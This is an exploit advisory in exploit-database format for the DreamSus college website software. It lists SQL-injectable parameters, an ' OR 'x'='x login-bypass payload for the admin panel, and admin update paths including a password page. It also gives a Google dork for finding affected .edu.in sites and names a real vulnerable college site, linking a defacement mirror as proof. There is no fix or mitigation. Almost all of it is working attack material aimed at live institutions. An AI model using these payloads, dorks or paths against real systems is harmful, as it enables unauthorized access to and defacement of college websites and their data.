#################################################################################################
# Exploit Title : Dreams Ultimate Solutions DreamSus India Improper Authorization and SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 09/11/2018
# Vendor Homepage : dreamsus.com
# Tested On : Windows and Linux
# Category : WebApps
# Version Information :
# Google Dork : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-592 [ Authentication Bypass Issues ] CWE-284 [ Improper Access Control ] CWE-285 [ Improper Authorization ]
#################################################################################################
# SQL Injection Exploit :
/upcoming_events.php?type=event&d_id=[SQL Injection]
/news_details.php?newsid=[SQL Injection]
/news_home_detail.php?newsid=[SQL Injection]
/college_staff.php?d_id=[SQL Injection]
/research.php?type=research&d_id=[SQL Injection]
/college_courses.php?type=Under%20Graduate&d_id=[SQL Injection]
/college_courses.php?type=Post%20Graduate&d_id=[SQL Injection]
/college_courses.php?type=Skill%20Development&d_id=[SQL Injection]
/college_courses.php?type=Other%20Courses&d_id=[SQL Injection]
#################################################################################################
# Admin Panel Login Path :
/login.php
Admin Username : anything' OR 'x'='x
Admin Password : anything' OR 'x'='x
/show_department.php
/crud_department.php?action=update&uid=1
/show_faculty.php
/crud_faculty.php?action=update&uid=1
/show_ac_year.php
/crud_ac_year.php?action=update&uid=1
/show_staff_type.php
/crud_staff_type.php?action=update&uid=1
/show_designation.php
/crud_designation.php?action=update&uid=1
/show_event_type.php
/crud_event_type.php?action=update&uid=2
/show_course_type.php
/crud_course_type.php?action=update&uid=1
/show_award_type.php
/crud_award_type.php?action=update&uid=1
/show_password.php
/crud_password.php?action=update&uid=1
/show_department_info.php
/show_staff_details.php
/show_dept_facilities.php
/show_courses.php
/show_courses.php?type=1
/show_courses.php?type=2
/show_courses.php?type=3
/show_event.php
/show_collaboration.php
/show_staff_achievement.php
/show_staff_acheievement_image.php
/show_student_achievement.php
/show_stud_acheievement_image.php
/show_download.php
/show_placementcell.php
/show_placement_alumni.php
/show_pc_collaboration.php
/show_dir_admin.php
/show_dir_other.php
/show_news.php
/show_video.php
/show_notice.php
/show_award.php
/show_testimonial.php
/show_gallery.php
/show_faq.php
/show_admission.php
/show_previous_paper.php
/show_hostel.php
/show_hostel_gallery.php
/show_commitee.php
/show_commitee_member.php
/show_commitee_work.php
/show_research.php
/show_publication.php
/show_research_grant.php
/show_feedback.php
#################################################################################################
# Example Vulnerable Site =>
[+] spcollegejejuri.edu.in/news_home_detail.php?newsid=6%27
=> [ Proof of Concept ] => zone-h.org/mirror/id/31868951 ~ archive.is/RhfMw
#################################################################################################
# SQL Database Error :
Fatal error: Call to a member function fetch_assoc() on boolean in /home/spcolleg/public_html/news_details.php on line 128
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################